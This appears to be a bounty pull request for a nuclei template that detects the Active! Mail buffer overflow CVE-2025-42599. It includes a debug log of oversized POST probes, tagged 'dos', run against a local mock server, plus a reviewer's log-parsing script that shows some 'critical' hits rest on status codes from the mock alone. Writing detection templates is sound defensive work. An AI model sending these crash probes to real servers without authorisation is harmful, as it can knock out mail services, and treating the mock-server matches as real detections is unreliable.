Template / PR Information

This PR adds a detection template for CVE-2025-42599 affecting Active! Mail Server versions ≤ 6.60.05008561. The vulnerability is a stack-based buffer overflow in the mail processing interface allowing remote unauthenticated attackers to execute arbitrary code or cause denial-of-service conditions.

Template Validation

I’ve validated this template locally?

  • YES
  • NO
pranjal@PranjalLappyx:~/Desktop/nuclei-templates/activemail-docker-test$ nuclei -t ../http/cves/2025/CVE-2025-42599.YAML \
-u http://localhost:9999/ \
-debug -v \
-debug-req -debug-resp \
-include-tags dos \
-o "docker_test_comprehensive_$(date +%Y%m%d_%H%M%S).txt"
                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.7

                projectdiscovery.io
[VER] Started metrics server at localhost:9092
[INF] Current nuclei version: v3.4.7 (outdated)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2025-42599] Dumped HTTP request for http://localhost:9999/
GET / HTTP/1.1
Host: localhost:9999
User-Agent:
Accept: */*
Connection: close
[INF] [CVE-2025-42599] Dumped HTTP request for http://localhost:9999/
POST / HTTP/1.1
Host: localhost:9999
Content-Type: application/x-www-form-urlencoded
Content-Length: 1001
Connection: close
[VER] [CVE-2025-42599] Sent HTTP request to http://localhost:9999/
[DBG] [CVE-2025-42599] Dumped HTTP response http://localhost:9999/
HTTP/1.1 405 METHOD NOT ALLOWED
Content-Length: 153
Access-Control-Allow-Origin: *
Allow: HEAD, GET, OPTIONS
Connection: close
Content-Type: text/html; charset=utf-8
Date: Tue, 02 Sep 2025 21:29:55 GMT
Server: Werkzeug/3.0.6 Python/3.8.10
<!doctype html>
<html lang=en>
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>
[INF] [CVE-2025-42599] Dumped HTTP request for http://localhost:9999/
GET / HTTP/1.1
Host: localhost:9999
Accept: */*
Connection: close
[INF] [CVE-2025-42599] Dumped HTTP request for http://localhost:9999/mail
POST /mail HTTP/1.1
Host: localhost:9999
Content-Type: application/x-www-form-urlencoded
Content-Length: 1200
Connection: close
[VER] [CVE-2025-42599] Sent HTTP request to http://localhost:9999/mail
[DBG] [CVE-2025-42599] Dumped HTTP response http://localhost:9999/mail
HTTP/1.1 503 SERVICE UNAVAILABLE
Content-Length: 55
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/plain; charset=utf-8
Date: Tue, 02 Sep 2025 21:30:25 GMT
Server: Werkzeug/3.0.6 Python/3.8.10
Service Unavailable - Stack Overflow Error in POST Data
[CVE-2025-42599:status-1] [http] [critical] http://localhost:9999/mail
[INF] [CVE-2025-42599] Dumped HTTP request for http://localhost:9999/smtp
POST /smtp HTTP/1.1
Host: localhost:9999
Content-Type: text/plain
Content-Length: 1500
Connection: close
[VER] [CVE-2025-42599] Sent HTTP request to http://localhost:9999/smtp
[DBG] [CVE-2025-42599] Dumped HTTP response http://localhost:9999/smtp
HTTP/1.1 500 INTERNAL SERVER ERROR
Content-Length: 41
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/plain; charset=utf-8
Date: Tue, 02 Sep 2025 21:30:25 GMT
Server: Werkzeug/3.0.6 Python/3.8.10
SMTP Error - Buffer Overflow in Mail Data
[CVE-2025-42599:status-1] [http] [critical] http://localhost:9999/smtp
[CVE-2025-42599:word-2] [http] [critical] http://localhost:9999/smtp
[INF] Scan completed in 1m. 3 matches found.

Additional References:

/claim #12963 /close #12963
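
A reviewer's check on the validation run above, as an added example that is not part of the PR or of nuclei: it joins each matcher hit in the `-debug` transcript to the response it fired on, so the status code and `Server` header behind every hit are visible and hits that rest on a status code alone stand out. It assumes unnamed matchers are reported as `<type>-<index>` (as in `status-1` and `word-2` above); `summarize` and `status_only_urls` are names chosen here.

```python
import re

# Constructed sample: the two matched exchanges from the run above, with the
# request dumps and the other response headers left out.
SAMPLE = """\
[DBG] [CVE-2025-42599] Dumped HTTP response http://localhost:9999/mail
HTTP/1.1 503 SERVICE UNAVAILABLE
Server: Werkzeug/3.0.6 Python/3.8.10
Service Unavailable - Stack Overflow Error in POST Data
[CVE-2025-42599:status-1] [http] [critical] http://localhost:9999/mail
[DBG] [CVE-2025-42599] Dumped HTTP response http://localhost:9999/smtp
HTTP/1.1 500 INTERNAL SERVER ERROR
Server: Werkzeug/3.0.6 Python/3.8.10
SMTP Error - Buffer Overflow in Mail Data
[CVE-2025-42599:status-1] [http] [critical] http://localhost:9999/smtp
[CVE-2025-42599:word-2] [http] [critical] http://localhost:9999/smtp
"""

RESP = re.compile(r"^\[DBG\] \[[^\]]+\] Dumped HTTP response (\S+)$")
STATUS = re.compile(r"^HTTP/\d(?:\.\d)? (\d{3}) ")
MATCH = re.compile(r"^\[([^\]:]+):([^\]]+)\] \[http\] \[(\w+)\] (\S+)$")

def summarize(log):
    """One record per matcher hit, joined to the response dumped for its URL."""
    responses, current, hits = {}, None, []
    for line in log.splitlines():
        if m := RESP.match(line):          # start of a dumped response
            current = responses[m.group(1)] = {"status": None, "server": None}
        elif m := MATCH.match(line):       # result line: [id:matcher] ...
            _, matcher, severity, url = m.groups()
            seen = responses.get(url, {})
            hits.append({"url": url, "matcher": matcher, "severity": severity,
                         "status": seen.get("status"), "server": seen.get("server")})
        elif line.startswith("["):         # any other log line ends the dump
            current = None
        elif current is not None:
            if current["status"] is None and (m := STATUS.match(line)):
                current["status"] = int(m.group(1))
            elif line.lower().startswith("server:"):
                current["server"] = line.split(":", 1)[1].strip()
    return hits

def status_only_urls(hits):
    """URLs where every matcher that fired was a status-code matcher
    (assumes nuclei's `<type>-<index>` naming for unnamed matchers)."""
    fired = {}
    for h in hits:
        fired.setdefault(h["url"], []).append(h["matcher"])
    return [u for u, ms in fired.items() if all(m.startswith("status") for m in ms)]
```

On the transcript above this lists three hits, all on responses served by `Werkzeug/3.0.6 Python/3.8.10`, and reports `/mail` as matched on status alone.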

Claim

Total prize pool $100
Total paid $0
Status Pending
Submitted September 02, 2025
Last updated September 02, 2025

Contributors

Pranjal Negi

@Pranjal6955

100%

Sponsors

ProjectDiscovery

@projectdiscovery

$100